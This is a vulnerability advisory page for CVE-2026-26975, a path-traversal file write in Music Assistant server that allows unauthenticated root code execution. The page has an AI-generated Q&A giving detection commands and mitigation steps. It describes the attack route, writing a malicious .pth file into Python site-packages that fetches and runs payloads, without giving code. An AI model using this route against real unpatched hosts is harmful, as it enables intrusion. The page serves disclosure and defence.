CVE-2026-26975
Arbitrary File Write in Music Assistant Enables Remote Code Execution
Publication date: 2026-02-20
Last updated on: 2026-03-17
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| music-assistant | music_assistant_server | to 2.7.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-434 | The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. |
| CWE-73 | The product allows user input to control or influence paths or file names that are used in filesystem operations. |
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-26975 is a high-severity remote code execution vulnerability in Music Assistant versions 2.6.3 and below. It arises because the music/playlists/update API does not properly enforce the .m3u file extension, allowing attackers to write arbitrary files anywhere on the filesystem.
An unauthenticated network-adjacent attacker can exploit this by creating a malicious .pth file in the Python site-packages directory, which executes arbitrary Python code with root privileges when Python starts. This is possible because the Music Assistant container runs as root and the web interface is exposed without authentication.
The attack involves manipulating playlist storage paths and injecting Python code that downloads and executes malicious binaries and scripts, leading to full remote code execution on the affected system.
How can this vulnerability impact me? :
This vulnerability allows an attacker to execute arbitrary code with root privileges on your Music Assistant installation without any authentication or user interaction.
The impact includes complete compromise of the affected system, allowing attackers to install malware, steal data, disrupt services, or use the system as a foothold for further attacks.
Because the container runs as root, the attacker gains full control over the host environment, which can lead to severe confidentiality, integrity, and availability breaches.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring network traffic and API requests to the Music Assistant service, especially on port 8095 where the web interface is exposed without authentication in vulnerable versions (2.6.3 and below). Suspicious HTTP API requests to the `music/playlists/update` endpoint that attempt to write files with extensions other than ".m3u" or target critical filesystem paths (such as Python site-packages directories) may indicate exploitation attempts.'}, {'type': 'paragraph', 'content': 'Commands to detect potential exploitation include inspecting active network connections and HTTP requests to port 8095, for example using tools like tcpdump or Wireshark to filter traffic on that port.'}, {'type': 'list_item', 'content': 'Use tcpdump to capture traffic on port 8095: `tcpdump -i any port 8095 -w capture.pcap`'}, {'type': 'list_item', 'content': 'Use curl or similar tools to check if the API is accessible without authentication: `curl http://<host>:8095/music/playlists/update` and observe if unauthorized access is possible.'}, {'type': 'list_item', 'content': 'Check for suspicious files in the Python site-packages directory, such as unexpected `.pth` files, which may indicate exploitation.'}, {'type': 'paragraph', 'content': 'Additionally, reviewing logs for HTTP 500 errors triggered by malicious API calls or unexpected Python process startups may help identify exploitation attempts.'}] [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate and most effective mitigation is to upgrade Music Assistant to version 2.7.0 or later, where this vulnerability has been fixed by enforcing mandatory authentication on the webserver and API.
If upgrading immediately is not possible, restrict network access to the Music Assistant service port (8095) to trusted users only, for example by firewall rules or network segmentation, to prevent unauthenticated access.
Implement monitoring to detect suspicious API usage and file system changes, especially in the Python site-packages directory.
After upgrading, ensure that authentication is properly configured and that admin accounts are created as required by the new version.